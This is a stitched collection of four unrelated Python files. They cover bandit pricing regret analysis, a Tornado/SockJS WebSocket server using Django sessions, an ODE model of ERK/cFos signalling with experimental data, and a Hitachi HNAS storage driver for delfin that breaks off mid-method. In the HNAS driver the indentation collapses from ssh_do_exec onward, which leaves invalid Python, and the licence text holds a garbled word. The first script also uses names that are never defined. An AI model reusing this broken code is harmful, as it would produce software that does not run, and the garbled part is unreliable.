N_ARMS_PRICE = 11
FIXED_BUDGET = [1000 / 3, 1000 / 3, 1000 / 3]
PRICE_PLOT_N_POINTS = 100
MIN_PRICE = 15
MAX_PRICE = 25
FIXED_COST = 12
# Pickled experiment outputs; the i-th entry of each list belongs to
# BANDIT_NAME[i] (rewards per user, and per-day user-index boundaries).
REWARD_FILE_LIST = ["../../report/project_point_4/Apr17_18-21-54/reward_TS.pkl",
                    "../../report/project_point_4/Apr17_18-40-58/reward_UCB1.pkl",
                    "../../report/project_point_4/Apr17_18-47-46/reward_UCBL.pkl",
                    "../../report/project_point_4/Apr17_20-07-36/reward_UCB1M.pkl",
                    "../../report/project_point_4/Apr17_21-36-22/reward_UCBLM.pkl",
                    "../../report/project_point_4/Apr17_18-56-01/reward_EXP3.pkl"]
DAYS_FILE_LIST = ["../../report/project_point_4/Apr17_18-21-54/day_TS.pkl",
                  "../../report/project_point_4/Apr17_18-40-58/day_UCB1.pkl",
                  "../../report/project_point_4/Apr17_18-47-46/day_UCBL.pkl",
                  "../../report/project_point_4/Apr17_20-07-36/day_UCB1M.pkl",
                  "../../report/project_point_4/Apr17_21-36-22/day_UCBLM.pkl",
                  "../../report/project_point_4/Apr17_18-56-01/day_EXP3.pkl"]
BANDIT_NAME = ["TS", "UCB1", "UCBL", "UCB1M", "UCBLM", "EXP3"]
n_bandit = len(BANDIT_NAME)
# Create the (dated) output folder for this run.
_, folder_path_with_date = handle_folder_creation(result_path=FOLDER_RESULT, retrieve_text_file=False)
assert len(REWARD_FILE_LIST) == len(BANDIT_NAME), "Number of bandits and file list does not match"
assert len(REWARD_FILE_LIST) == len(DAYS_FILE_LIST), "Number of bandits and file list does not match"
# Reading file list
# total_reward_list[b][e][u] = reward of user u in experiment e for bandit b;
# total_day_list[b][e][d] = index of the first user of day d.
total_reward_list = []
total_day_list = []
# NOTE(review): "curr_day" here is actually the bandit index, not a day.
for curr_day, _ in enumerate(BANDIT_NAME):
    rewards = []
    with (open(REWARD_FILE_LIST[curr_day], "rb")) as openfile:
        while True:
            try:
                rewards.append(pickle.load(openfile))
            except EOFError:
                break
    days = []
    with (open(DAYS_FILE_LIST[curr_day], "rb")) as openfile:
        while True:
            try:
                days.append(pickle.load(openfile))
            except EOFError:
                break
    # Each pickle file holds a single top-level object.
    rewards = rewards[0]
    days = days[0]
    total_reward_list.append(rewards)
    total_day_list.append(days)
# Compute N-days: the shortest experiment bounds the comparable horizon.
n_days = np.inf
for curr_day, day_list_bandit in enumerate(total_day_list):
    for j, day_list_exp in enumerate(day_list_bandit):
        if len(day_list_exp) < n_days:
            n_days = len(day_list_exp)
# Day boundaries delimit n-1 full days.
n_days = n_days - 1
# Compute mean and standard deviation for each day
# Row layout: one row per bandit, plus a final row holding the day index.
mean_reward = np.zeros(shape=(n_bandit + 1, n_days))
std_reward = np.zeros(shape=(n_bandit + 1, n_days))
mean_reward[-1] = np.arange(n_days) + 1
std_reward[-1] = np.arange(n_days) + 1
for bandit_idx in range(len(BANDIT_NAME)):
    n_exp = len(total_reward_list[bandit_idx])
    for curr_day in range(n_days):
        daily_values = []
        for exp in range(n_exp):
            # Sum the rewards of the users served during this day.
            start_user = total_day_list[bandit_idx][exp][curr_day]
            end_user = total_day_list[bandit_idx][exp][curr_day + 1]
            daily_values.append(np.array(total_reward_list[bandit_idx][exp][start_user:end_user]).sum())
        mean_reward[bandit_idx][curr_day] = np.array(daily_values).mean()
        std_reward[bandit_idx][curr_day] = np.array(daily_values).std()
mean_df = pd.DataFrame(mean_reward.transpose())
std_df = pd.DataFrame(std_reward.transpose())
for bandit_idx, name in enumerate(BANDIT_NAME):
    mean_df.rename(columns={bandit_idx: "mean_reward_{}".format(name)}, inplace=True)
mean_df.rename(columns={n_bandit: "day"}, inplace=True)
# NOTE(review): column prefix "mean_std_" is inconsistent with the
# "std_regret_" naming used below; kept as-is since downstream plots may
# rely on the existing CSV headers.
for bandit_idx, name in enumerate(BANDIT_NAME):
    std_df.rename(columns={bandit_idx: "mean_std_{}".format(name)}, inplace=True)
std_df.rename(columns={n_bandit: "day"}, inplace=True)
total_df = mean_df.merge(std_df, left_on="day", right_on="day")
total_df.to_csv("{}instant_reward.csv".format(folder_path_with_date), index=False)
# Aggregated plot under a fixed budget
# Load the noise-free ("mean") scenario to evaluate the true CRP and
# click curves of the first phase.
mean_scenario: Scenario = EnvironmentManager.load_scenario(SCENARIO_NAME, get_mean_function=True)
crp_function_list: List[IStochasticFunction] = mean_scenario.get_phases()[0].get_crp_function()
click_function_list: List[IStochasticFunction] = mean_scenario.get_phases()[0].get_n_clicks_function()
# Weight each class CRP by its share of clicks under the fixed budget split,
# yielding the aggregated (class-blind) CRP.
context_weight = np.array([f.draw_sample(FIXED_BUDGET[i]) for i, f in enumerate(click_function_list)])
context_weight = context_weight / context_weight.sum()  # weights to retrieve the aggregated CRP
aggregated_crp: AggregatedFunction = AggregatedFunction(f_list=crp_function_list, weights=context_weight)
# Sample the aggregated CRP on a uniform price grid and dump it for plotting.
price_point_arr = np.linspace(MIN_PRICE, MAX_PRICE, PRICE_PLOT_N_POINTS)
crp_data = np.zeros(shape=(1 + 1, PRICE_PLOT_N_POINTS))
crp_data[-1] = price_point_arr
for j, point in enumerate(price_point_arr):
    crp_data[0][j] = aggregated_crp.draw_sample(point)
crp_df: pd.DataFrame = pd.DataFrame(crp_data.transpose())
crp_df.rename(columns={0: "mean_aggr_crp", 1: "price"}, inplace=True)
crp_df.to_csv("{}aggregated_crp_data.csv".format(folder_path_with_date), index=False)
# Expected per-user profit: CRP(price) * margin over the fixed unit cost.
# (The redundant second np.linspace of the same grid was removed.)
profit_data = np.zeros(shape=(1 + 1, PRICE_PLOT_N_POINTS))
profit_data[-1] = price_point_arr
for j, point in enumerate(price_point_arr):
    # Bug fix: the margin used a hard-coded 12 instead of FIXED_COST.
    profit_data[0][j] = aggregated_crp.draw_sample(point) * (point - FIXED_COST)
profit_df: pd.DataFrame = pd.DataFrame(profit_data.transpose())
profit_df.rename(columns={0: "profit_0", 1: "price"}, inplace=True)
profit_df.to_csv("{}aggregated_profit_data.csv".format(folder_path_with_date), index=False)
# Optimal point computation: maximize profit by minimizing its negation
# over the feasible price interval.
aggregated_profit: MultipliedStochasticFunction = MultipliedStochasticFunction(aggregated_crp, shift=-FIXED_COST)
min_result = minimize_scalar(aggregated_profit.get_minus_lambda(), bounds=(MIN_PRICE, MAX_PRICE), method="bounded")
optimal_mean_reward_user = aggregated_profit.draw_sample(min_result["x"])
average_daily_users = np.array([f.draw_sample(FIXED_BUDGET[i]) for i, f in enumerate(click_function_list)]).sum()
optimal_mean_daily_reward = optimal_mean_reward_user * average_daily_users
print("Optimal mean reward is {}, reached at x={}\n".format(optimal_mean_reward_user, min_result["x"]))
print("Optimal mean daily reward is {}, since there are {} daily users".format(optimal_mean_daily_reward,
                                                                               average_daily_users))
# Compute regret
# Daily cumulative regret vs. the continuous optimum (best real-valued price).
if CSV_DAILY_CONT_REGRET:
    mean_regret_data = np.zeros(shape=(n_bandit + 1, n_days))
    std_regret_data = np.zeros(shape=(n_bandit + 1, n_days))
    mean_regret_data[-1] = np.arange(n_days) + 1
    std_regret_data[-1] = np.arange(n_days) + 1
    for bandit_idx in range(len(BANDIT_NAME)):
        n_exp = len(total_reward_list[bandit_idx])
        for curr_day in range(n_days):
            daily_values = []
            for exp in range(n_exp):
                # Cumulative regret up to the end of curr_day:
                # (days elapsed * optimal daily reward) - collected reward.
                end_user = total_day_list[bandit_idx][exp][curr_day + 1]
                daily_values.append((curr_day + 1) * optimal_mean_daily_reward - np.array(
                    total_reward_list[bandit_idx][exp][0:end_user]).sum())
            mean_regret_data[bandit_idx][curr_day] = np.array(daily_values).mean()
            std_regret_data[bandit_idx][curr_day] = np.array(daily_values).std()
    mean_df = pd.DataFrame(mean_regret_data.transpose())
    std_df = pd.DataFrame(std_regret_data.transpose())
    for bandit_idx, name in enumerate(BANDIT_NAME):
        mean_df.rename(columns={bandit_idx: "mean_regret_{}".format(name)}, inplace=True)
    mean_df.rename(columns={n_bandit: "day"}, inplace=True)
    for bandit_idx, name in enumerate(BANDIT_NAME):
        std_df.rename(columns={bandit_idx: "std_regret_{}".format(name)}, inplace=True)
    std_df.rename(columns={n_bandit: "day"}, inplace=True)
    total_df = mean_df.merge(std_df, left_on="day", right_on="day")
    total_df.to_csv("{}daily_regret.csv".format(folder_path_with_date), index=False)
# Regret computation with correct arms (and not all the function)
# i.e. the clairvoyant is restricted to the N_ARMS_PRICE discrete prices.
aggregated_profit: MultipliedStochasticFunction = MultipliedStochasticFunction(aggregated_crp, shift=-FIXED_COST)
points = np.linspace(start=MIN_PRICE, stop=MAX_PRICE, num=N_ARMS_PRICE)
profit_points = np.array([aggregated_profit.draw_sample(x) for x in points])
optimal_discrete_profit = profit_points.max()
average_daily_users = np.array([f.draw_sample(FIXED_BUDGET[i]) for i, f in enumerate(click_function_list)]).sum()
optimal_mean_daily_reward_discrete = optimal_discrete_profit * average_daily_users
print("Optimal mean discrete reward is {}, reached for arm index = {}\n".format(optimal_discrete_profit,
                                                                                profit_points.argmax()))
print("Optimal mean daily reward is {}, since there are {} daily users".format(optimal_mean_daily_reward_discrete,
                                                                               average_daily_users))
# Daily cumulative regret vs. the best discrete arm.
if CSV_DAILY_DISCRETE_REGRET:
    mean_regret_data = np.zeros(shape=(n_bandit + 1, n_days))
    std_regret_data = np.zeros(shape=(n_bandit + 1, n_days))
    mean_regret_data[-1] = np.arange(n_days) + 1
    std_regret_data[-1] = np.arange(n_days) + 1
    for bandit_idx in range(len(BANDIT_NAME)):
        n_exp = len(total_reward_list[bandit_idx])
        for curr_day in range(n_days):
            daily_values = []
            for exp in range(n_exp):
                end_user = total_day_list[bandit_idx][exp][curr_day + 1]
                daily_values.append((curr_day + 1) * optimal_mean_daily_reward_discrete - np.array(
                    total_reward_list[bandit_idx][exp][0:end_user]).sum())
            mean_regret_data[bandit_idx][curr_day] = np.array(daily_values).mean()
            std_regret_data[bandit_idx][curr_day] = np.array(daily_values).std()
    mean_df = pd.DataFrame(mean_regret_data.transpose())
    std_df = pd.DataFrame(std_regret_data.transpose())
    for bandit_idx, name in enumerate(BANDIT_NAME):
        mean_df.rename(columns={bandit_idx: "mean_regret_{}".format(name)}, inplace=True)
    mean_df.rename(columns={n_bandit: "day"}, inplace=True)
    for bandit_idx, name in enumerate(BANDIT_NAME):
        std_df.rename(columns={bandit_idx: "std_regret_{}".format(name)}, inplace=True)
    std_df.rename(columns={n_bandit: "day"}, inplace=True)
    total_df = mean_df.merge(std_df, left_on="day", right_on="day")
    total_df.to_csv("{}daily_discrete_regret.csv".format(folder_path_with_date), index=False)
# Compute regret user-wise
# Per-user cumulative regret vs. the best discrete arm.
if CSV_DISCRETE_USER_REGRET:
    total_users = len(total_reward_list[0][0])
    mean_data = np.zeros(shape=(n_bandit + 1, total_users))
    std_data = np.zeros(shape=(n_bandit + 1, total_users))
    mean_data[-1] = np.arange(total_users)
    std_data[-1] = np.arange(total_users)
    for bandit_idx in range(n_bandit):
        n_exp = len(total_reward_list[bandit_idx])
        values = [[] for _ in range(total_users)]
        for exp in range(n_exp):
            # Running sum of collected reward over the user sequence.
            curr_exp_value = 0
            for user in range(total_users):
                curr_exp_value += total_reward_list[bandit_idx][exp][user]
                values[user].append((user + 1) * optimal_discrete_profit - curr_exp_value)
        for user in range(total_users):
            mean_data[bandit_idx][user] = np.array(values[user]).mean()
            std_data[bandit_idx][user] = np.array(values[user]).std()
    mean_df = pd.DataFrame(mean_data.transpose())
    std_df = pd.DataFrame(std_data.transpose())
    for bandit_idx, name in enumerate(BANDIT_NAME):
        mean_df.rename(columns={bandit_idx: "mean_regret_{}".format(name)}, inplace=True)
    mean_df.rename(columns={n_bandit: "user"}, inplace=True)
    for bandit_idx, name in enumerate(BANDIT_NAME):
        std_df.rename(columns={bandit_idx: "std_regret_{}".format(name)}, inplace=True)
    std_df.rename(columns={n_bandit: "user"}, inplace=True)
    total_df = mean_df.merge(std_df, left_on="user", right_on="user")
    total_df.to_csv("{}discrete_user_regret.csv".format(folder_path_with_date), index=False)
# Compute regret user-wise with real loss
# Same as above but against the continuous (real-valued) optimum.
if CSV_CONTINUE_USER_REGRET:
    total_users = len(total_reward_list[0][0])
    mean_data = np.zeros(shape=(n_bandit+1, total_users))
    std_data = np.zeros(shape=(n_bandit+1, total_users))
    mean_data[-1] = np.arange(total_users)
    std_data[-1] = np.arange(total_users)
    for bandit_idx in range(n_bandit):
        n_exp = len(total_reward_list[bandit_idx])
        values = [[] for _ in range(total_users)]
        for exp in range(n_exp):
            curr_exp_value = 0
            for user in range(total_users):
                curr_exp_value += total_reward_list[bandit_idx][exp][user]
                values[user].append((user + 1) * optimal_mean_reward_user - curr_exp_value)
        for user in range(total_users):
            mean_data[bandit_idx][user] = np.array(values[user]).mean()
            std_data[bandit_idx][user] = np.array(values[user]).std()
    mean_df = pd.DataFrame(mean_data.transpose())
    std_df = pd.DataFrame(std_data.transpose())
    for bandit_idx, name in enumerate(BANDIT_NAME):
        mean_df.rename(columns={bandit_idx: "mean_regret_{}".format(name)}, inplace=True)
    mean_df.rename(columns={n_bandit: "user"}, inplace=True)
    for bandit_idx, name in enumerate(BANDIT_NAME):
        std_df.rename(columns={bandit_idx: "std_regret_{}".format(name)}, inplace=True)
    std_df.rename(columns={n_bandit: "user"}, inplace=True)
    total_df = mean_df.merge(std_df, left_on="user", right_on="user")
    total_df.to_csv("{}cont_user_regret.csv".format(folder_path_with_date), index=False)
|
from game.utils import config
import os
import logging
import json
import django.core.handlers.wsgi
from django.conf import settings
from tornado import ioloop
import tornado.ioloop
import tornado.web
import tornado.wsgi
import tornado.httpserver
import django.utils.importlib
import django.contrib.auth
from django.contrib.auth.models import AnonymousUser
from sockjs.tornado import SockJSConnection
from sockjs.tornado import SockJSRouter
import game.channels
logger = logging.getLogger(__name__)
class BroadcastConnection(SockJSConnection):
    """SockJS connection that authenticates via the Django session cookie and
    dispatches subscribe/unsubscribe commands to game channels."""
    #TODO csrf
    clients = set()

    def __init__(self, session):
        super().__init__(session)
        self.user = None

    def on_open(self, info):
        self.clients.add(self)
        # Keep-alive ticker: push 'pong' to the client once per second.
        self.timeout = ioloop.PeriodicCallback(self._ticker, 1000)
        self.timeout.start()

        # Minimal stand-in for a Django HttpRequest; get_user() only needs
        # an object exposing a ``.session`` attribute.
        class DjangoRequest(object):
            def __init__(self, session):
                self.session = session

        # get Django session and resolve the user.
        # Bug fix: this lookup was mis-indented into DjangoRequest.__init__,
        # where ``info`` (the sockjs connection info) is not in scope.
        engine = django.utils.importlib.import_module(django.conf.settings.SESSION_ENGINE)
        cookie_name = django.conf.settings.SESSION_COOKIE_NAME
        try:
            session_key = info.get_cookie(cookie_name).value
        except AttributeError:
            # No session cookie present -> anonymous visitor.
            self.user = AnonymousUser()
            return
        session = engine.SessionStore(session_key)
        session = session.load()
        request = DjangoRequest(session)
        self.user = django.contrib.auth.get_user(request)

    def on_message(self, msg):
        """Handle an incoming frame: keep-alive ping or a JSON command."""
        if msg == "ping":
            self.send("pong")
            return
        data = json.loads(msg)
        command = data['command']
        if command == "subscribe":
            self.handle_subscribe(data)
        elif command == "unsubscribe":
            self.handle_unsubscribe(data)

    def handle_subscribe(self, params):
        # Bug fix: logger.debug(msg, arg) uses %-formatting; the original
        # format string had no placeholder, so params was never logged.
        logger.debug("Subscribing, params: %s", params)
        channel_class, channel_name = params['channel'].split('.')
        try:
            channel = game.channels.Channel.channels[channel_class]
        except KeyError:
            #TODO report error to the client
            logger.error("Channel class not found: %s" % channel_class)
            return
        channel.subscribe(self.user, self, channel_name)

    def handle_unsubscribe(self, params):
        logger.debug("unsubscribing, params: %s", params)
        channel_class, channel_name = params['channel'].split('.')
        channel = game.channels.Channel.channels[channel_class]
        channel.unsubscribe(self.user, self, channel_name)

    def on_close(self):
        self.clients.remove(self)
        #channel.remove_connections(self, channel_name)
        #TODO remove all channel connections
        self.timeout.stop()

    def _ticker(self):
        # Periodic keep-alive push to the client.
        self.send('pong')
class NoCacheStaticFileHandler(tornado.web.StaticFileHandler):
    # Static handler for frequently-edited assets: forbid browser caching.
    def set_extra_headers(self, path):
        self.set_header('Cache-Control', 'no-store, no-cache, must-revalidate, max-age=0')
def main():
    """Wire Django (WSGI fallback), SockJS broadcast routes and static file
    handlers into one tornado application and serve it."""
    # Django handles any URL not matched by the explicit routes below.
    wsgi_app = tornado.wsgi.WSGIContainer(django.core.handlers.wsgi.WSGIHandler())
    broadcast_router = SockJSRouter(BroadcastConnection, '/broadcast')
    app = tornado.web.Application(
        broadcast_router.urls +
        [
            # Generated frontend assets are served uncached so deploys are
            # picked up immediately.
            (r"/static/angular/(.*)", NoCacheStaticFileHandler, {"path": os.path.join(settings.PROJECT_DIR, 'static_generated', "angular")}),
            (r"/static/js/(.*)", NoCacheStaticFileHandler, {"path": os.path.join(settings.PROJECT_DIR, 'static_generated', "js")}),
            (r"/static/css/(.*)", NoCacheStaticFileHandler, {"path": os.path.join(settings.PROJECT_DIR, 'static_generated', "css")}),
            (r"/static/(.*)", tornado.web.StaticFileHandler, {"path": os.path.join(settings.PROJECT_DIR, 'static_generated')}),
            (r"/robots.txt()$", tornado.web.StaticFileHandler, {"path": os.path.join(settings.PROJECT_DIR, 'static_generated', "robots.txt")}),
            #(r"/()$", tornado.web.StaticFileHandler, {"path": os.path.join(settings.PROJECT_DIR, 'static_generated', "angular", "index.html")}),
            ('.*', tornado.web.FallbackHandler, dict(fallback=wsgi_app)),
        ],
        debug=config.debug,
    )
    server = tornado.httpserver.HTTPServer(app)
    server.listen(config.port, config.address)
    logger.info("listening at: http://%s:%s", config.address, config.port)
    # Blocks forever serving requests.
    tornado.ioloop.IOLoop.instance().start()
# Script entry point.
if __name__ == "__main__":
    main()
|
import numpy as np
from .name2idx import C, V
from .set_model import diffeq
from .solver import solveode, get_steady_state
# Observable species compared against the experimental time courses below;
# this ordering fixes the first axis of NumericalSimulation.simulations.
observables = [
    'Phosphorylated_MEKc',
    'Phosphorylated_ERKc',
    'Phosphorylated_RSKw',
    'Phosphorylated_CREBw',
    'dusp_mRNA',
    'cfos_mRNA',
    'cFos_Protein',
    'Phosphorylated_cFos',
]
class NumericalSimulation(object):
    """Integrate the ODE model for each ligand condition and cache the
    observable trajectories.

    ``simulations[obs, t, cond]`` holds observable ``observables[obs]`` at
    time index ``t`` for condition ``conditions[cond]``.
    """
    tspan = [0, 5400]  # [start, end] (Unit time: 1 sec.)
    t = np.arange(tspan[0], tspan[-1]+1)/60.  # sec. -> min. (plot_func.py)
    conditions = ['EGF', 'HRG']
    # Shared, class-level result buffer filled by simulate().
    simulations = np.empty((len(observables), len(t), len(conditions)))

    def simulate(self, x, y0):
        """Simulate all conditions with parameters ``x`` and initial state
        ``y0``; returns False if the solver fails, otherwise None.

        NOTE(review): mutates ``x`` in place (x[C.Ligand] is overwritten per
        condition) — callers should pass a copy if they reuse ``x``.
        """
        # get steady state
        x[C.Ligand] = x[C.no_ligand]  # No ligand
        (T_steady_state, Y_steady_state) = get_steady_state(
            diffeq, y0, self.tspan, tuple(x)
        )
        # If the solver stopped early, steady state was not reached.
        if T_steady_state < self.tspan[-1]:
            return False
        else:
            y0 = Y_steady_state[:]
        # add ligand
        for i, condition in enumerate(self.conditions):
            if condition == 'EGF':
                x[C.Ligand] = x[C.EGF]
            elif condition == 'HRG':
                x[C.Ligand] = x[C.HRG]
            (T, Y) = solveode(diffeq, y0, self.tspan, tuple(x))
            if T[-1] < self.tspan[-1]:
                return False
            else:
                # Cytosolic + nuclear species; nuclear amounts are scaled by
                # the volume ratio Vn/Vc to express them in cytosolic units.
                self.simulations[observables.index('Phosphorylated_MEKc'), :, i] = (
                    Y[:, V.ppMEKc]
                )
                self.simulations[observables.index('Phosphorylated_ERKc'), :, i] = (
                    Y[:, V.pERKc] + Y[:, V.ppERKc]
                )
                self.simulations[observables.index('Phosphorylated_RSKw'), :, i] = (
                    Y[:, V.pRSKc] + Y[:, V.pRSKn]*(x[C.Vn]/x[C.Vc])
                )
                self.simulations[observables.index('Phosphorylated_CREBw'), :, i] = (
                    Y[:, V.pCREBn]*(x[C.Vn]/x[C.Vc])
                )
                self.simulations[observables.index('dusp_mRNA'), :, i] = (
                    Y[:, V.duspmRNAc]
                )
                self.simulations[observables.index('cfos_mRNA'), :, i] = (
                    Y[:, V.cfosmRNAc]
                )
                self.simulations[observables.index('cFos_Protein'), :, i] = (
                    (Y[:, V.pcFOSn] + Y[:, V.cFOSn])*(x[C.Vn]/x[C.Vc])
                    + Y[:, V.cFOSc] + Y[:, V.pcFOSc]
                )
                self.simulations[observables.index('Phosphorylated_cFos'), :, i] = (
                    Y[:, V.pcFOSn]*(x[C.Vn]/x[C.Vc]) + Y[:, V.pcFOSc]
                )
class ExperimentalData(object):
    """Normalized experimental time courses (per condition) and the sampling
    time points associated with each observable."""
    experiments = [None]*len(observables)
    # Sampling times in seconds; t2..t5 cover different observable groups.
    t2 = [0, 300, 600, 900, 1800, 2700, 3600, 5400]
    experiments[observables.index('Phosphorylated_MEKc')] = {
        'EGF': [0.000, 0.773, 0.439, 0.252, 0.130, 0.087, 0.080, 0.066],
        'HRG': [0.000, 0.865, 1.000, 0.837, 0.884, 0.920, 0.875, 0.789],
    }
    experiments[observables.index('Phosphorylated_ERKc')] = {
        'EGF': [0.000, 0.867, 0.799, 0.494, 0.313, 0.266, 0.200, 0.194],
        'HRG': [0.000, 0.848, 1.000, 0.971, 0.950, 0.812, 0.747, 0.595],
    }
    experiments[observables.index('Phosphorylated_RSKw')] = {
        'EGF': [0, 0.814, 0.812, 0.450, 0.151, 0.059, 0.038, 0.030],
        'HRG': [0, 0.953, 1.000, 0.844, 0.935, 0.868, 0.779, 0.558],
    }
    experiments[observables.index('Phosphorylated_cFos')] = {
        'EGF': [0, 0.060, 0.109, 0.083, 0.068, 0.049, 0.027, 0.017],
        'HRG': [0, 0.145, 0.177, 0.158, 0.598, 1.000, 0.852, 0.431],
    }
    # --------------------------------------------------------------------------
    t3 = [0, 600, 1800, 3600, 5400]
    experiments[observables.index('Phosphorylated_CREBw')] = {
        'EGF': [0, 0.446, 0.030, 0.000, 0.000],
        'HRG': [0, 1.000, 0.668, 0.460, 0.340],
    }
    # --------------------------------------------------------------------------
    t4 = [0, 600, 1200, 1800, 2700, 3600, 5400]
    experiments[observables.index('cfos_mRNA')] = {
        'EGF': [0, 0.181, 0.476, 0.518, 0.174, 0.026, 0.000],
        'HRG': [0, 0.353, 0.861, 1.000, 0.637, 0.300, 0.059],
    }
    # --------------------------------------------------------------------------
    t5 = [0, 900, 1800, 2700, 3600, 5400]
    experiments[observables.index('cFos_Protein')] = {
        'EGF': [0, 0.078, 0.216, 0.240, 0.320, 0.235],
        'HRG': [0, 0.089, 0.552, 0.861, 1.000, 0.698],
    }
    experiments[observables.index('dusp_mRNA')] = {
        'EGF': [0.000, 0.177, 0.331, 0.214, 0.177, 0.231],
        'HRG': [0.000, 0.221, 0.750, 1.000, 0.960, 0.934],
    }

    def get_timepoint(self, obs_idx):
        """Return the sampling times (seconds, as ints) for observable index
        ``obs_idx``; raises ValueError for an index without data."""
        if obs_idx in [
            observables.index('Phosphorylated_MEKc'),
            observables.index('Phosphorylated_ERKc'),
            observables.index('Phosphorylated_RSKw'),
            observables.index('Phosphorylated_cFos'),
        ]:
            exp_t = self.t2
        elif obs_idx == observables.index('Phosphorylated_CREBw'):
            exp_t = self.t3
        elif obs_idx == observables.index('cfos_mRNA'):
            exp_t = self.t4
        elif obs_idx in [
            observables.index('cFos_Protein'),
            observables.index('dusp_mRNA'),
        ]:
            exp_t = self.t5
        else:
            # Bug fix: an unmatched index previously fell through and raised
            # UnboundLocalError on exp_t; fail with an explicit error.
            raise ValueError(
                'No time points defined for observable index {}'.format(obs_idx))
        return list(map(int, exp_t))
|
# Copyright 2021 The SODA Authors.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WarrayANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import hashlib
import time
import eventlet
import six
from oslo_log import log as logging
from oslo_utils import units
from delfin import exception, utils
from delfin.common import constants
from delfin.drivers.utils import ssh_client
from delfin.drivers.hitachi.hnas import constants as constant
from delfin.drivers.utils.tools import Tools
LOG = logging.getLogger(__name__)
class NasHandler(object):
    def __init__(self, **kwargs):
        # Pool of SSH connections to the HNAS system; kwargs carry the
        # access credentials/host details.
        self.ssh_pool = ssh_client.SSHPool(**kwargs)
        # EVS (virtual server) cache; presumably populated by methods outside
        # this chunk — confirm before relying on it.
        self.evs_list = []
def ssh_do_exec(self, command_list):
res = None
with eventlet.Timeout(60, False):
res = self.ssh_pool.do_exec_shell(command_list)
while 'Failed to establish SSC connection' in res:
res = self.ssh_pool.do_exec_shell(command_list)
if res:
return res
else:
raise \
exception.ConnectTimeout(
'Failed to establish SSC connection from hitachi hnas'
)
def login(self):
try:
result = self.ssh_do_exec(['cluster-show -y'])
if 'EVS' not in result:
raise exception.InvalidIpOrPort()
except Exception as e:
LOG.error("Failed to login hnas %s" %
(six.text_type(e)))
raise e
@staticmethod
def format_data_to_map(
value_info,
value_key,
line='\r\n',
split=":",
split_key=None):
map_list = []
detail_array = value_info.split(line)
value_map = {}
for detail in detail_array:
if detail:
string_info = detail.split(split)
key = string_info[0].replace(' ', '')
value = ''
if len(string_info) > 1:
for string in string_info[1:]:
value += string.\
replace('""', '').\
replace('\'', '').\
replace(' ', '')
if value_map.get(key):
value_map[key + '1'] = value
else:
value_map[key] = value
else:
if value_key in value_map:
map_list.append(value_map)
value_map = {}
if split_key and split_key in detail:
if value_key in value_map:
map_list.append(value_map)
value_map = {}
if value_key in value_map:
map_list.append(value_map)
return map_list
@staticmethod
def get_table_data(values, is_alert=False):
header_index = 0
table = values.split('\r\n')
for i in range(len(table)):
if constant.DATA_HEAD_PATTERN.search(table[i]):
header_index = i
if is_alert and constant.ALERT_HEAD_PATTERN.search(table[i]):
header_index = i
return table[(header_index + 1):]
return table[(header_index + 1):]
    def format_storage_info(self, storage_map_list,
                            model_map_list, version_map_list,
                            location_map_list, serial_map_list):
        """Assemble the delfin storage dict from the parsed console maps.

        Raises StorageBackendException when no cluster data was parsed.
        """
        if not storage_map_list:
            raise exception.StorageBackendException(
                'Failed to get HNAS storage')
        # Each *_map_list holds parsed records; only the last one is used.
        model_map = model_map_list[-1] if model_map_list else {}
        model = model_map.get('Model')
        # NOTE(review): model/Software/Hardware lookups assume the keys are
        # present — .get() returning None would raise AttributeError on the
        # following replace()/split(). Confirm the console output guarantees
        # these fields.
        model = model.replace('HNAS', 'HNAS ')
        version_map = version_map_list[-1] if version_map_list else {}
        location_map = location_map_list[-1] if location_map_list else {}
        serial_map = serial_map_list[-1] if serial_map_list else {}
        version = version_map.get("Software").split('(')
        serial_number = serial_map.get("Hardware").split('(')[-1]
        storage_map = storage_map_list[-1]
        disk_list = self.get_disk(None)
        # Chained assignment: initialize all four capacity counters to 0.
        total_capacity = \
            raw_capacity = \
            used_capacity = \
            free_capacity = 0
        for disk in disk_list:
            raw_capacity += disk['capacity']
        status = \
            constant.CLUSTER_STATUS.get(storage_map['ClusterHealth'])
        # Pool capacities are aggregated into the cluster-level totals.
        pool_list = self.get_pool(None)
        for pool in pool_list:
            total_capacity += pool['total_capacity']
            used_capacity += pool['used_capacity']
            free_capacity += pool['free_capacity']
        storage_model = {
            "name": storage_map['ClusterName'],
            "vendor": constant.STORAGE_VENDOR,
            "model": model,
            "status": status,
            "serial_number": serial_number.replace(')', ''),
            "firmware_version": version[0],
            "location": location_map['Location'],
            "total_capacity": total_capacity,
            "raw_capacity": raw_capacity,
            "used_capacity": used_capacity,
            "free_capacity": free_capacity
        }
        return storage_model
def get_storage(self):
try:
storage_info = self.ssh_do_exec([constant.STORAGE_INFO_COMMAND])
model_info = self.ssh_do_exec([constant.STORAGE_MODEL_COMMAND])
location_info = self.ssh_do_exec(([constant.LOCATION_COMMAND]))
model_map_list = \
self.format_data_to_map(model_info, 'Model')
storage_map_list = \
self.format_data_to_map(
storage_info, 'ClusterName', split="=")
version_map_list = \
self.format_data_to_map(model_info, 'Software')
location_map_list = \
self.format_data_to_map(location_info, 'Location')
serial_map_list =\
self.format_data_to_map(model_info, 'Hardware')
storage_model = \
self.format_storage_info(
storage_map_list, model_map_list, version_map_list,
location_map_list, serial_map_list)
return storage_model
except exception.DelfinException as e:
err_msg = "Failed to get storage from " \
"hitachi nas: %s" % (six.text_type(e.msg))
LOG.error(err_msg)
raise e
except Exception as err:
err_msg = "Failed to get storage from " \
"hitachi nas: %s" % (six.text_type(err))
LOG.error(err_msg)
raise exception.InvalidResults(err_msg)
    def get_disk(self, storage_id):
        """Parse disk-listing CLI output into delfin disk models.

        :param storage_id: storage identifier stamped on each disk dict
        :return: list of disk dicts
        :raises exception.InvalidResults: on any unexpected parse error
        """
        try:
            disk_info = self.ssh_do_exec([constant.DISK_INFO_COMMAND])
            disk_map_list = \
                self.format_data_to_map(disk_info, 'Capacity')
            disks_list = []
            for disk_map in disk_map_list:
                # Only entries that report a 'Status' are real disks.
                if 'Status' in disk_map:
                    # Keep the figure before 'GiB' and relabel it GB for
                    # Tools.get_capacity_size.
                    size = disk_map['Capacity'].split('GiB')[0] + "GB"
                    status = constants.DiskStatus.NORMAL \
                        if disk_map['Status'] == 'OK' \
                        else constants.DiskStatus.ABNORMAL
